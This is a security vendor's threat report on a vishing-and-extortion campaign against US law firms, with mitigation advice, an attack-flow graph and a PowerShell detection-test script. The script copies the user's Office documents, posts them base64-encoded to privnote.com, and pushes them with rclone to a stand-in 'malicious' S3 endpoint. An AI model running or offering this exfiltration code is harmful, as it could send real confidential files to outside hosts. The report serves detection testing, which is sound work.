Seeking Counsel: Ongoing Targeted Attacks Against US Law Firms

SOC Prime Team

Seeking Counsel: Ongoing Targeted Attacks Against US Law Firms

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

A financially motivated threat cluster tracked as UNC3753 is running vishing campaigns that trick victims into installing remote monitoring and management software. Once access is established, the actors steal sensitive legal and financial information and then extort the victim organization by threatening public exposure. The campaign is focused on U.S. professional services firms, particularly law firms, and may involve both cyber-enabled and physical data theft.

Investigation

Mandiant observed the complete intrusion cycle, from the initial voice-phishing call to data theft and extortion, sometimes within a single business day. Victims were convinced to use screen-sharing tools and RMM software such as AnyDesk, Bomgar, or a custom SuperOps installer delivered with a curl command. Data exfiltration was carried out using tools such as WinSCP, Rclone, or direct uploads to consumer cloud storage accounts.

Mitigation

Organizations should train staff to recognize vishing attempts, enforce strict verification procedures for any remote support request, and block unauthorized RMM and screen-sharing tools. Disabling removable media, monitoring for unusual outbound transfers to cloud storage or FTP destinations, applying conditional access controls to VDI, and enforcing MFA on critical document repositories can further reduce risk.

Response

If this activity is detected, isolate the affected endpoint immediately, terminate any unauthorized remote sessions, and remove installed RMM binaries. Investigators should collect command-line history, registry changes, and scheduled task artifacts for forensic review. Compromised credentials should be reset, data exfiltration should be assessed, and law enforcement engagement should be considered if extortion has begun.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccccff classDef operator fill:#ff9900 %% Node definitions initial_access["Action – T1566.004 Phishing: Spearphishing Voice Description: Attacker uses a convincing voice call to trick the target into providing credentials or executing malicious commands."] class initial_access action user_execution["Action – T1204.002 Malicious File Tool: cURL + MSI installer Description: Victim runs a malicious MSI file downloaded via cURL, resulting in code execution on the system."] class user_execution action remote_desktop["Action – T1219.002 Remote Desktop Software Tools: Zoom, Microsoft Teams, AnyDesk Description: Legitimate remoteu2011desktop or meeting applications are abused to maintain persistent remote access."] class remote_desktop action discovery["Action – T1083 File and Directory Discovery & T1680 Local Storage Discovery Description: Adversary enumerates files, directories and local storage locations to locate valuable data for exfiltration."] class discovery action data_staging["Action – T1074 Data Staged & T1560 Archive Collected Data Description: Collected files are staged locally and compressed into archives to prepare for exfiltration."] class data_staging action exfiltration["Action – T1567.002 Exfiltration to Cloud Storage & T1020 Automated Exfiltration Target: Google Drive Description: Automated upload of staged archives to a cloud storage service for remote extraction."] class exfiltration action physical_media["Action – T1052 Exfiltration Over Physical Medium Description: Transfer of data onto removable media for offline exfiltration when network channels are restricted."] class physical_media action cleanup["Action – T1070.001 Clear Windows Event Logs Description: Deletion of Windows event logs to erase evidence of the intrusion."] class cleanup action %% Edge connections initial_access –>|leads_to| user_execution user_execution –>|enables| remote_desktop remote_desktop –>|enables| discovery discovery –>|leads_to| data_staging data_staging –>|enables| exfiltration exfiltration –>|leads_to| physical_media physical_media –>|followed_by| cleanup "

Attack Flow

Attack Narrative & Commands:
1. Recon & Data Staging (T1005, T1083):
  The adversary enumerates user directories and copies all *.docx and *.xlsx files to a staging folder C:TempStagedData.
2. Upload via Privnote (T1567.002):
  Using PowerShell, the attacker reads each file, base‑64‑encodes the content, and posts it to https://privnote.com/api/note. The command line includes the URL, which satisfies the selection_privnote condition.
3. Transfer with Rclone (T1020):
  The attacker runs rclone.exe (downloaded on‑the‑fly) to push the staged files to a malicious S3 bucket. The process name “rclone.exe” matches selection_tool.
4. Cleanup: Delete the staging folder and any residual binaries.

Regression Test Script: (PowerShell – self‑contained, no external dependencies beyond Invoke-WebRequest.)

# -------------------------------------------------
# UNC3753 Exfiltration Simulation – PowerShell
# -------------------------------------------------
# 1. Prepare staging directory
$staging = "$env:USERPROFILETempStagedData"
New-Item -ItemType Directory -Force -Path $staging | Out-Null

# 2. Copy sample data (simulate data collection)
Get-ChildItem -Path "$env:USERPROFILEDocuments" -Include *.docx, *.xlsx -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object { Copy-Item -Path $_.FullName -Destination $staging -Force }

# 3. Upload each file to Privnote (web‑service exfiltration)
$privnoteUrl = "https://privnote.com/api/note"
Get-ChildItem -Path $staging -File | ForEach-Object {
    $content = [Convert]::ToBase64String([IO.File]::ReadAllBytes($_.FullName))
    $body = @{ text = $content }
    # The URL appears in the command line -> triggers selection_privnote
    Invoke-WebRequest -Uri $privnoteUrl -Method POST -Body $body -UseBasicParsing | Out-Null
}

# 4. Download Rclone (if not present) and exfiltrate via S3
$rcloneExe = "$env:TEMPrclone.exe"
if (-not (Test-Path $rcloneExe)) {
    Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "$env:TEMPrclone.zip"
    Expand-Archive -Path "$env:TEMPrclone.zip" -DestinationPath $env:TEMP -Force
    Move-Item -Path (Get-ChildItem "$env:TEMPrclone-*-windows-amd64rclone.exe").FullName -Destination $rcloneExe -Force
}

# Configure a remote (malicious) S3 bucket – the config is written to a temporary file
$rcloneConfig = @"
[malicious
type = s3
provider = AWS
access_key_id = AKIAFAKEKEY
secret_access_key = fakeSecretKey123
region = us-east-1
endpoint = https://malicious-s3.example.com
"@
$configPath = "$env:TEMPrclone.conf"
$rcloneConfig | Set-Content -Path $configPath -Encoding ASCII

# Execute rclone copy – process name "rclone.exe" triggers selection_tool
& $rcloneExe copy $staging "malicious:exfil" --config $configPath --log-level INFO

# 5. Cleanup
Remove-Item -Recurse -Force $staging
Remove-Item -Force $rcloneExe, $configPath

Cleanup Commands:

# Terminate any lingering WinSCP or Rclone processes
Get-Process -Name WinSCP, rclone -ErrorAction SilentlyContinue | Stop-Process -Force

# Delete temporary files left behind (if any)
Remove-Item -Path "$env:TEMPWinSCP.exe","$env:TEMPWinSCP.zip","$env:TEMPrclone.zip","$env:TEMPrclone-*-windows-amd64" -Recurse -Force -ErrorAction SilentlyContinue

End of Report

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free